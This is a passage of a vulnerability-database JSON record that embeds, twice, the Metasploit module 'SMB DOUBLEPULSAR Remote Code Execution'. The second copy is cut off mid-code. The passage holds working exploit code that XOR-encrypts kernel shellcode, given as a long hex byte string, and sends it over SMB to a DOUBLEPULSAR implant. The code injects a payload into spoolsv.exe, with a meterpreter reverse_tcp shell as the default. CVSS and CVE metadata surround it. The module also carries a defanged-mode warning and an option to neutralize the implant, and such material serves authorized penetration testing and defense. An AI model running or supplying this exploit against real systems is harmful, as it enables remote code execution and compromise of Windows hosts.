investigation.\r\n\r\n Disable the DefangedMode option if you have authorization to proceed.\r\n EOF\r\n\r\n fail_with(Failure::BadConfig, warning)\r\n end\r\n\r\n # No ForceExploit because @tree_id and @xor_key are required\r\n unless check == CheckCode::Vulnerable\r\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\r\n end\r\n\r\n case target.name\r\n when 'Execute payload (x64)'\r\n unless @xor_key\r\n fail_with(Failure::NotFound, 'XOR key not found')\r\n end\r\n\r\n if @arch == ARCH_X86\r\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\r\n end\r\n\r\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\r\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\r\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\r\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\r\n\r\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\r\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\r\n\r\n print_status('Sending shellcode to DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\r\n when 'Neutralize implant'\r\n return neutralize_implant\r\n end\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Payload execution successful')\r\n when :invalid_params\r\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\r\n when :alloc_failure\r\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n ensure\r\n disconnect\r\n end\r\n\r\n def neutralize_implant\r\n print_status('Neutralizing DOUBLEPULSAR')\r\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\r\n\r\n case calculate_doublepulsar_status(@multiplex_id, code)\r\n when :success\r\n print_good('Implant neutralization successful')\r\n else\r\n fail_with(Failure::Unknown, 'An unknown error occurred')\r\n end\r\n end\r\n\r\n def do_smb_setup_tree(ipc_share)\r\n connect\r\n\r\n # logon as user \\\r\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\r\n\r\n # connect to IPC$\r\n simple.connect(ipc_share)\r\n\r\n # return tree\r\n simple.shares[ipc_share]\r\n end\r\n\r\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\r\n # make doublepulsar knock\r\n pkt = make_smb_trans2_doublepulsar(opcode, body)\r\n\r\n sock.put(pkt)\r\n bytes = sock.get_once\r\n\r\n return unless bytes\r\n\r\n # convert packet to response struct\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\r\n pkt.from_s(bytes[4..-1])\r\n\r\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\r\n end\r\n\r\n def make_smb_trans2_doublepulsar(opcode, body)\r\n setup_count = 1\r\n setup_data = [0x000e].pack('v')\r\n\r\n param = generate_doublepulsar_param(opcode, body)\r\n data = param + body.to_s\r\n\r\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\r\n simple.client.smb_defaults(pkt['Payload']['SMB'])\r\n\r\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\r\n param_offset = base_offset\r\n data_offset = param_offset + param.length\r\n\r\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\r\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\r\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\r\n\r\n @multiplex_id = rand(0xffff)\r\n\r\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\r\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\r\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\r\n\r\n pkt['Payload'].v['ParamCountTotal'] = param.length\r\n pkt['Payload'].v['DataCountTotal'] = body.to_s.length\r\n pkt['Payload'].v['ParamCountMax'] = 1\r\n pkt['Payload'].v['DataCountMax'] = 0\r\n pkt['Payload'].v['ParamCount'] = param.length\r\n pkt['Payload'].v['ParamOffset'] = param_offset\r\n pkt['Payload'].v['DataCount'] = body.to_s.length\r\n pkt['Payload'].v['DataOffset'] = data_offset\r\n pkt['Payload'].v['SetupCount'] = setup_count\r\n pkt['Payload'].v['SetupData'] = setup_data\r\n pkt['Payload'].v['Timeout'] = generate_doublepulsar_timeout(opcode)\r\n pkt['Payload'].v['Payload'] = data\r\n\r\n pkt.to_s\r\n end\r\n\r\n # ring3 = user mode encoded payload\r\n # proc_name = process to inject APC into\r\n def make_kernel_user_payload(ring3, proc_name)\r\n sc = make_kernel_shellcode(proc_name)\r\n\r\n sc << [ring3.length].pack('S<')\r\n sc << ring3\r\n\r\n sc\r\n end\r\n\r\n def generate_process_hash(process)\r\n # x64_calc_hash from external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n proc_hash = 0\r\n process << \"\\x00\"\r\n\r\n process.each_byte do |c|\r\n proc_hash = ror(proc_hash, 13)\r\n proc_hash += c\r\n end\r\n\r\n [proc_hash].pack('l<')\r\n end\r\n\r\n def ror(dword, bits)\r\n (dword >> bits | dword << (32 - bits)) & 0xFFFFFFFF\r\n end\r\n\r\n def make_kernel_shellcode(proc_name)\r\n # see: external/source/shellcode/windows/multi_arch_kernel_queue_apc.asm\r\n # Length: 780 bytes\r\n \"\\x31\\xc9\\x41\\xe2\\x01\\xc3\\x56\\x41\\x57\\x41\\x56\\x41\\x55\\x41\\x54\\x53\" \\\r\n \"\\x55\\x48\\x89\\xe5\\x66\\x83\\xe4\\xf0\\x48\\x83\\xec\\x20\\x4c\\x8d\\x35\\xe3\" \\\r\n \"\\xff\\xff\\xff\\x65\\x4c\\x8b\\x3c\\x25\\x38\\x00\\x00\\x00\\x4d\\x8b\\x7f\\x04\" \\\r\n \"\\x49\\xc1\\xef\\x0c\\x49\\xc1\\xe7\\x0c\\x49\\x81\\xef\\x00\\x10\\x00\\x00\\x49\" \\\r\n \"\\x8b\\x37\\x66\\x81\\xfe\\x4d\\x5a\\x75\\xef\\x41\\xbb\\x5c\\x72\\x11\\x62\\xe8\" \\\r\n \"\\x18\\x02\\x00\\x00\\x48\\x89\\xc6\\x48\\x81\\xc6\\x08\\x03\\x00\\x00\\x41\\xbb\" \\\r\n \"\\x7a\\xba\\xa3\\x30\\xe8\\x03\\x02\\x00\\x00\\x48\\x89\\xf1\\x48\\x39\\xf0\\x77\" \\\r\n \"\\x11\\x48\\x8d\\x90\\x00\\x05\\x00\\x00\\x48\\x39\\xf2\\x72\\x05\\x48\\x29\\xc6\" \\\r\n \"\\xeb\\x08\\x48\\x8b\\x36\\x48\\x39\\xce\\x75\\xe2\\x49\\x89\\xf4\\x31\\xdb\\x89\" \\\r\n \"\\xd9\\x83\\xc1\\x04\\x81\\xf9\\x00\\x00\\x01\\x00\\x0f\\x8d\\x66\\x01\\x00\\x00\" \\\r\n \"\\x4c\\x89\\xf2\\x89\\xcb\\x41\\xbb\\x66\\x55\\xa2\\x4b\\xe8\\xbc\\x01\\x00\\x00\" \\\r\n \"\\x85\\xc0\\x75\\xdb\\x49\\x8b\\x0e\\x41\\xbb\\xa3\\x6f\\x72\\x2d\\xe8\\xaa\\x01\" \\\r\n \"\\x00\\x00\\x48\\x89\\xc6\\xe8\\x50\\x01\\x00\\x00\\x41\\x81\\xf9\" +\r\n generate_process_hash(proc_name.upcase) +\r\n \"\\x75\\xbc\\x49\\x8b\\x1e\\x4d\\x8d\\x6e\\x10\\x4c\\x89\\xea\\x48\\x89\\xd9\" \\\r\n \"\\x41\\xbb\\xe5\\x24\\x11\\xdc\\xe8\\x81\\x01\\x00\\x00\\x6a\\x40\\x68\\x00\\x10\" \\\r\n \"\\x00\\x00\\x4d\\x8d\\x4e\\x08\\x49\\xc7\\x01\\x00\\x10\\x00\\x00\\x4d\\x31\\xc0\" \\\r\n \"\\x4c\\x89\\xf2\\x31\\xc9\\x48\\x89\\x0a\\x48\\xf7\\xd1\\x41\\xbb\\x4b\\xca\\x0a\" \\\r\n \"\\xee\\x48\\x83\\xec\\x20\\xe8\\x52\\x01\\x00\\x00\\x85\\xc0\\x0f\\x85\\xc8\\x00\" \\\r\n \"\\x00\\x00\\x49\\x8b\\x3e\\x48\\x8d\\x35\\xe9\\x00\\x00\\x00\\x31\\xc9\\x66\\x03\" \\\r\n \"\\x0d\\xd7\\x01\\x00\\x00\\x66\\x81\\xc1\\xf9\\x00\\xf3\\xa4\\x48\\x89\\xde\\x48\" \\\r\n \"\\x81\\xc6\\x08\\x03\\x00\\x00\\x48\\x89\\xf1\\x48\\x8b\\x11\\x4c\\x29\\xe2\\x51\" \\\r\n \"\\x52\\x48\\x89\\xd1\\x48\\x83\\xec\\x20\\x41\\xbb\\x26\\x40\\x36\\x9d\\xe8\\x09\" \\\r\n \"\\x01\\x00\\x00\\x48\\x83\\xc4\\x20\\x5a\\x59\\x48\\x85\\xc0\\x74\\x18\\x48\\x8b\" \\\r\n \"\\x80\\xc8\\x02\\x00\\x00\\x48\\x85\\xc0\\x74\\x0c\\x48\\x83\\xc2\\x4c\\x8b\\x02\" \\\r\n \"\\x0f\\xba\\xe0\\x05\\x72\\x05\\x48\\x8b\\x09\\xeb\\xbe\\x48\\x83\\xea\\x4c\\x49\" \\\r\n \"\\x89\\xd4\\x31\\xd2\\x80\\xc2\\x90\\x31\\xc9\\x41\\xbb\\x26\\xac\\x50\\x91\\xe8\" \\\r\n \"\\xc8\\x00\\x00\\x00\\x48\\x89\\xc1\\x4c\\x8d\\x89\\x80\\x00\\x00\\x00\\x41\\xc6\" \\\r\n \"\\x01\\xc3\\x4c\\x89\\xe2\\x49\\x89\\xc4\\x4d\\x31\\xc0\\x41\\x50\\x6a\\x01\\x49\" \\\r\n \"\\x8b\\x06\\x50\\x41\\x50\\x48\\x83\\xec\\x20\\x41\\xbb\\xac\\xce\\x55\\x4b\\xe8\" \\\r\n \"\\x98\\x00\\x00\\x00\\x31\\xd2\\x52\\x52\\x41\\x58\\x41\\x59\\x4c\\x89\\xe1\\x41\" \\\r\n \"\\xbb\\x18\\x38\\x09\\x9e\\xe8\\x82\\x00\\x00\\x00\\x4c\\x89\\xe9\\x41\\xbb\\x22\" \\\r\n \"\\xb7\\xb3\\x7d\\xe8\\x74\\x00\\x00\\x00\\x48\\x89\\xd9\\x41\\xbb\\x0d\\xe2\\x4d\" \\\r\n \"\\x85\\xe8\\x66\\x00\\x00\\x00\\x48\\x89\\xec\\x5d\\x5b\\x41\\x5c\\x41\\x5d\\x41\" \\\r\n \"\\x5e\\x41\\x5f\\x5e\\xc3\\xe9\\xb5\\x00\\x00\\x00\\x4d\\x31\\xc9\\x31\\xc0\\xac\" \\\r\n \"\\x41\\xc1\\xc9\\x0d\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\x01\\xc1\\x38\\xe0\\x75\" \\\r\n \"\\xec\\xc3\\x31\\xd2\\x65\\x48\\x8b\\x52\\x60\\x48\\x8b\\x52\\x18\\x48\\x8b\\x52\" \\\r\n \"\\x20\\x48\\x8b\\x12\\x48\\x8b\\x72\\x50\\x48\\x0f\\xb7\\x4a\\x4a\\x45\\x31\\xc9\" \\\r\n \"\\x31\\xc0\\xac\\x3c\\x61\\x7c\\x02\\x2c\\x20\\x41\\xc1\\xc9\\x0d\\x41\\x01\\xc1\" \\\r\n \"\\xe2\\xee\\x45\\x39\\xd9\\x75\\xda\\x4c\\x8b\\x7a\\x20\\xc3\\x4c\\x89\\xf8\\x41\" \\\r\n \"\\x51\\x41\\x50\\x52\\x51\\x56\\x48\\x89\\xc2\\x8b\\x42\\x3c\\x48\\x01\\xd0\\x8b\" \\\r\n \"\\x80\\x88\\x00\\x00\\x00\\x48\\x01\\xd0\\x50\\x8b\\x48\\x18\\x44\\x8b\\x40\\x20\" \\\r\n \"\\x49\\x01\\xd0\\x48\\xff\\xc9\\x41\\x8b\\x34\\x88\\x48\\x01\\xd6\\xe8\\x78\\xff\" \\\r\n \"\\xff\\xff\\x45\\x39\\xd9\\x75\\xec\\x58\\x44\\x8b\\x40\\x24\\x49\\x01\\xd0\\x66\" \\\r\n \"\\x41\\x8b\\x0c\\x48\\x44\\x8b\\x40\\x1c\\x49\\x01\\xd0\\x41\\x8b\\x04\\x88\\x48\" \\\r\n \"\\x01\\xd0\\x5e\\x59\\x5a\\x41\\x58\\x41\\x59\\x41\\x5b\\x41\\x53\\xff\\xe0\\x56\" \\\r\n \"\\x41\\x57\\x55\\x48\\x89\\xe5\\x48\\x83\\xec\\x20\\x41\\xbb\\xda\\x16\\xaf\\x92\" \\\r\n \"\\xe8\\x4d\\xff\\xff\\xff\\x31\\xc9\\x51\\x51\\x51\\x51\\x41\\x59\\x4c\\x8d\\x05\" \\\r\n \"\\x1a\\x00\\x00\\x00\\x5a\\x48\\x83\\xec\\x20\\x41\\xbb\\x46\\x45\\x1b\\x22\\xe8\" \\\r\n \"\\x68\\xff\\xff\\xff\\x48\\x89\\xec\\x5d\\x41\\x5f\\x5e\\xc3\"\r\n end\r\n\r\n def kernel_shellcode_size\r\n make_kernel_shellcode('').length\r\n end\r\n\r\nend\n\n# 0day.today [2021-11-05] #"}, "lastseen": "2021-11-04T22:15:36", "differentElements": ["sourceData"], "edition": 65}, {"bulletin": {"id": "1337DAY-ID-33895", "vendorId": null, "hash": "90b8d0833fc6be46c6824f7750ed36c5", "type": "zdt", "bulletinFamily": "exploit", "title": "SMB DOUBLEPULSAR Remote Code Execution Exploit", "description": "This Metasploit module executes a Metasploit payload against the Equation Group's DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE. While this module primarily performs code execution against the implant, the \"Neutralize implant\" target allows you to disable the implant.", "published": "2020-02-04T00:00:00", "modified": "2020-02-04T00:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://0day.today/exploit/description/33895", "reporter": "zdt", "references": [], "cvelist": ["CVE-2017-0148", "CVE-2017-0145", "CVE-2017-0146", "CVE-2017-0147", "CVE-2017-0144", "CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-11-07T11:46:19", "history": [], "viewCount": 114, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "mskb", "idList": ["KB4012598", "KB4013389"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:142548", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:154690"]}, {"type": "exploitdb", "idList": ["EDB-ID:41891", "EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-33313", "1337DAY-ID-27613", "1337DAY-ID-29702", "1337DAY-ID-27786", "1337DAY-ID-27752"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810698", "OPENVAS:1361412562310810676"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:ILITIES/MSFT-CVE-2017-0145/", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:ILITIES/MSFT-CVE-2017-0146/", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "700059.PRM", "SMB_NT_MS17-010.NASL"]}, {"type": "kaspersky", "idList": ["KLA10977"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "seebug", "idList": ["SSV:92952", "SSV:92964"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "cve", "idList": ["CVE-2017-0144", "CVE-2017-0146", "CVE-2017-0148", "CVE-2017-0147", "CVE-2017-0143", "CVE-2017-0145"]}, {"type": "symantec", "idList": ["SMNTC-96709", "SMNTC-96705", "SMNTC-96706", "SMNTC-96707", "SMNTC-96704", "SMNTC-96703"]}, {"type": "checkpoint_advisories", "idList": ["CPAI-2017-0200", "CPAI-2017-0205", "CPAI-2017-0419", "CPAI-2017-0203", "CPAI-2017-0198", "CPAI-2017-0177"]}, {"type": "kitploit", "idList": ["KITPLOIT:9146046356497464176"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:F01C658432B4BB0C2F28F1E5CE666104", "TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546", "TRENDMICROBLOG:4A07139FC4D015AFBEA9BD27C01BBA37"]}, {"type": "threatpost", "idList": ["THREATPOST:D6175B132FE6B7820E744D2387FE7D5D", "THREATPOST:758CC5987A361EA1BB8BBFFC425334D5", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:6520102503D39BD2183F4ECDEFA9D591", "THREATPOST:046D40D1A5114EC07BBA6DB3AE27AA61"]}, {"type": "mmpc", "idList": ["MMPC:89789F73D15A0B331512F90F7E692851", "MMPC:F3E0CD42C341A30C758CB85AD9F6D052", "MMPC:C211C70545FBDF88C2F99362DC4608A8", "MMPC:F4F919BF0CF7F97FD15CFA500398C7D9", "MMPC:FECB9309EE6D84976C56C12C05F1CD02"]}, {"type": "canvas", "idList": ["ETERNALBLUE", "MS17_010"]}, {"type": "thn", "idList": ["THN:FF56343C15BACA1C1CE83A105EFD7F77", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:2E043D9BAC04DEE81005124DD54A31E2", "THN:18A54BDD63D7DC2B3284D326E6510150"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:CD2337322AF45A03293696D535E4CBF8", "QUALYSBLOG:B891CB6093D217510DB7327088AE7FB2"]}, {"type": "mscve", "idList": ["MS:CVE-2017-0145", "MS:CVE-2017-0148", "MS:CVE-2017-0143"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "saint", "idList": ["SAINT:DAEC4BA69103823E03C8F3C832C5B41D", "SAINT:BD676E3751A4D110EAA275BF92CA7E46"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "malwarebytes", "idList": ["MALWAREBYTES:2AA5391DE4E1CAB582414AAD58B623CC"]}], "modified": "2021-11-07T11:46:19", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-11-07T11:46:19", "rev": 2}}, "objectVersion": "1.6", "sourceHref": "https://0day.today/exploit/33895", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n\n Rank = GreatRanking\n\n include Msf::Exploit::Remote::SMB::Client\n include Msf::Module::Deprecated\n\n moved_from 'exploit/windows/smb/doublepulsar_rce'\n\n MAX_SHELLCODE_SIZE = 4096\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'SMB DOUBLEPULSAR Remote Code Execution',\n 'Description' => %q{\n This module executes a Metasploit payload against the Equation Group's\n DOUBLEPULSAR implant for SMB as popularly deployed by ETERNALBLUE.\n\n While this module primarily performs code execution against the implant,\n the \"Neutralize implant\" target allows you to disable the implant.\n },\n 'Author' => [\n 'Equation Group', # DOUBLEPULSAR implant\n 'Shadow Brokers', # Equation Group dump\n 'zerosum0x0', # DOPU analysis and detection\n 'Luke Jennings', # DOPU analysis and detection\n 'wvu', # Metasploit module and arch detection\n 'Jacob Robles' # Metasploit module and RCE help\n ],\n 'References' => [\n ['MSB', 'MS17-010'],\n ['CVE', '2017-0143'],\n ['CVE', '2017-0144'],\n ['CVE', '2017-0145'],\n ['CVE', '2017-0146'],\n ['CVE', '2017-0147'],\n ['CVE', '2017-0148'],\n ['URL', 'https://zerosum0x0.blogspot.com/2017/04/doublepulsar-initial-smb-backdoor-ring.html'],\n ['URL', 'https://countercept.com/blog/analyzing-the-doublepulsar-kernel-dll-injection-technique/'],\n ['URL', 'https://www.countercept.com/blog/doublepulsar-usermode-analysis-generic-reflective-dll-loader/'],\n ['URL', 'https://github.com/countercept/doublepulsar-detection-script'],\n ['URL', 'https://github.com/countercept/doublepulsar-c2-traffic-decryptor'],\n ['URL', 'https://gist.github.com/msuiche/50a36710ee59709d8c76fa50fc987be1']\n ],\n 'DisclosureDate' => '2017-04-14', # Shadow Brokers leak\n 'License' => MSF_LICENSE,\n 'Platform' => 'win',\n 'Arch' => ARCH_X64,\n 'Privileged' => true,\n 'Payload' => {\n 'Space' => MAX_SHELLCODE_SIZE - kernel_shellcode_size,\n 'DisableNops' => true\n },\n 'Targets' => [\n ['Execute payload (x64)',\n 'DefaultOptions' => {\n 'EXITFUNC' => 'thread',\n 'PAYLOAD' => 'windows/x64/meterpreter/reverse_tcp'\n }\n ],\n ['Neutralize implant',\n 'DefaultOptions' => {\n 'PAYLOAD' => nil # XXX: \"Unset\" generic payload\n }\n ]\n ],\n 'DefaultTarget' => 0,\n 'Notes' => {\n 'AKA' => ['DOUBLEPULSAR'],\n 'RelatedModules' => [\n 'auxiliary/scanner/smb/smb_ms17_010',\n 'exploit/windows/smb/ms17_010_eternalblue'\n ],\n 'Stability' => [CRASH_OS_DOWN],\n 'Reliability' => [REPEATABLE_SESSION]\n }\n ))\n\n register_advanced_options([\n OptBool.new('DefangedMode', [true, 'Run in defanged mode', true]),\n OptString.new('ProcessName', [true, 'Process to inject payload into', 'spoolsv.exe'])\n ])\n end\n\n OPCODES = {\n ping: 0x23,\n exec: 0xc8,\n kill: 0x77\n }.freeze\n\n STATUS_CODES = {\n not_detected: 0x00,\n success: 0x10,\n invalid_params: 0x20,\n alloc_failure: 0x30\n }.freeze\n\n def calculate_doublepulsar_status(m1, m2)\n STATUS_CODES.key(m2.to_i - m1.to_i)\n end\n\n # algorithm to calculate the XOR Key for DoublePulsar knocks\n def calculate_doublepulsar_xor_key(s)\n x = (2 * s ^ (((s & 0xff00 | (s << 16)) << 8) | (((s >> 16) | s & 0xff0000) >> 8)))\n x & 0xffffffff # this line was added just to truncate to 32 bits\n end\n\n # The arch is adjacent to the XOR key in the SMB signature\n def calculate_doublepulsar_arch(s)\n s == 0 ? ARCH_X86 : ARCH_X64\n end\n\n def generate_doublepulsar_timeout(op)\n k = SecureRandom.random_bytes(4).unpack1('V')\n 0xff & (op - ((k & 0xffff00) >> 16) - (0xffff & (k & 0xff00) >> 8)) | k & 0xffff00\n end\n\n def generate_doublepulsar_param(op, body)\n case OPCODES.key(op)\n when :ping, :kill\n \"\\x00\" * 12\n when :exec\n Rex::Text.xor([@xor_key].pack('V'), [body.length, body.length, 0].pack('V*'))\n end\n end\n\n def check\n ipc_share = \"\\\\\\\\#{rhost}\\\\IPC$\"\n\n @tree_id = do_smb_setup_tree(ipc_share)\n vprint_good(\"Connected to #{ipc_share} with TID = #{@tree_id}\")\n vprint_status(\"Target OS is #{smb_peer_os}\")\n\n print_status('Sending ping to DOUBLEPULSAR')\n code, signature1, signature2 = do_smb_doublepulsar_pkt\n msg = 'Host is likely INFECTED with DoublePulsar!'\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n @xor_key = calculate_doublepulsar_xor_key(signature1)\n @arch = calculate_doublepulsar_arch(signature2)\n\n arch_str =\n case @arch\n when ARCH_X86\n 'x86 (32-bit)'\n when ARCH_X64\n 'x64 (64-bit)'\n end\n\n print_warning(\"#{msg} - Arch: #{arch_str}, XOR Key: 0x#{@xor_key.to_s(16).upcase}\")\n CheckCode::Vulnerable\n when :not_detected\n print_error('DOUBLEPULSAR not detected or disabled')\n CheckCode::Safe\n else\n print_error('An unknown error occurred')\n CheckCode::Unknown\n end\n end\n\n def exploit\n if datastore['DefangedMode']\n warning = <<~EOF\n\n\n Are you SURE you want to execute code against a nation-state implant?\n You MAY contaminate forensic evidence if there is an investigation.\n\n Disable the DefangedMode option if you have authorization to proceed.\n EOF\n\n fail_with(Failure::BadConfig, warning)\n end\n\n # No ForceExploit because @tree_id and @xor_key are required\n unless check == CheckCode::Vulnerable\n fail_with(Failure::NotVulnerable, 'Unable to proceed without DOUBLEPULSAR')\n end\n\n case target.name\n when 'Execute payload (x64)'\n unless @xor_key\n fail_with(Failure::NotFound, 'XOR key not found')\n end\n\n if @arch == ARCH_X86\n fail_with(Failure::NoTarget, 'x86 is not a supported target')\n end\n\n print_status(\"Generating kernel shellcode with #{datastore['PAYLOAD']}\")\n shellcode = make_kernel_user_payload(payload.encoded, datastore['ProcessName'])\n shellcode << rand_text(MAX_SHELLCODE_SIZE - shellcode.length)\n vprint_status(\"Total shellcode length: #{shellcode.length} bytes\")\n\n print_status(\"Encrypting shellcode with XOR key 0x#{@xor_key.to_s(16).upcase}\")\n xor_shellcode = Rex::Text.xor([@xor_key].pack('V'), shellcode)\n\n print_status('Sending shellcode to DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:exec], xor_shellcode)\n when 'Neutralize implant'\n return neutralize_implant\n end\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Payload execution successful')\n when :invalid_params\n fail_with(Failure::BadConfig, 'Invalid parameters were specified')\n when :alloc_failure\n fail_with(Failure::PayloadFailed, 'An allocation failure occurred')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n ensure\n disconnect\n end\n\n def neutralize_implant\n print_status('Neutralizing DOUBLEPULSAR')\n code, _signature1, _signature2 = do_smb_doublepulsar_pkt(OPCODES[:kill])\n\n case calculate_doublepulsar_status(@multiplex_id, code)\n when :success\n print_good('Implant neutralization successful')\n else\n fail_with(Failure::Unknown, 'An unknown error occurred')\n end\n end\n\n def do_smb_setup_tree(ipc_share)\n connect\n\n # logon as user \\\n simple.login(datastore['SMBName'], datastore['SMBUser'], datastore['SMBPass'], datastore['SMBDomain'])\n\n # connect to IPC$\n simple.connect(ipc_share)\n\n # return tree\n simple.shares[ipc_share]\n end\n\n def do_smb_doublepulsar_pkt(opcode = OPCODES[:ping], body = nil)\n # make doublepulsar knock\n pkt = make_smb_trans2_doublepulsar(opcode, body)\n\n sock.put(pkt)\n bytes = sock.get_once\n\n return unless bytes\n\n # convert packet to response struct\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS_RES_HDR_PKT.make_struct\n pkt.from_s(bytes[4..-1])\n\n return pkt['SMB'].v['MultiplexID'], pkt['SMB'].v['Signature1'], pkt['SMB'].v['Signature2']\n end\n\n def make_smb_trans2_doublepulsar(opcode, body)\n setup_count = 1\n setup_data = [0x000e].pack('v')\n\n param = generate_doublepulsar_param(opcode, body)\n data = param + body.to_s\n\n pkt = Rex::Proto::SMB::Constants::SMB_TRANS2_PKT.make_struct\n simple.client.smb_defaults(pkt['Payload']['SMB'])\n\n base_offset = pkt.to_s.length + (setup_count * 2) - 4\n param_offset = base_offset\n data_offset = param_offset + param.length\n\n pkt['Payload']['SMB'].v['Command'] = CONST::SMB_COM_TRANSACTION2\n pkt['Payload']['SMB'].v['Flags1'] = 0x18\n pkt['Payload']['SMB'].v['Flags2'] = 0xc007\n\n @multiplex_id = rand(0xffff)\n\n pkt['Payload']['SMB'].v['WordCount'] = 14 + setup_count\n pkt['Payload']['SMB'].v['TreeID'] = @tree_id\n pkt['Payload']['SMB'].v['MultiplexID'] = @multiplex_id\n\n pkt['Payload'].v['ParamCountTotal'] = 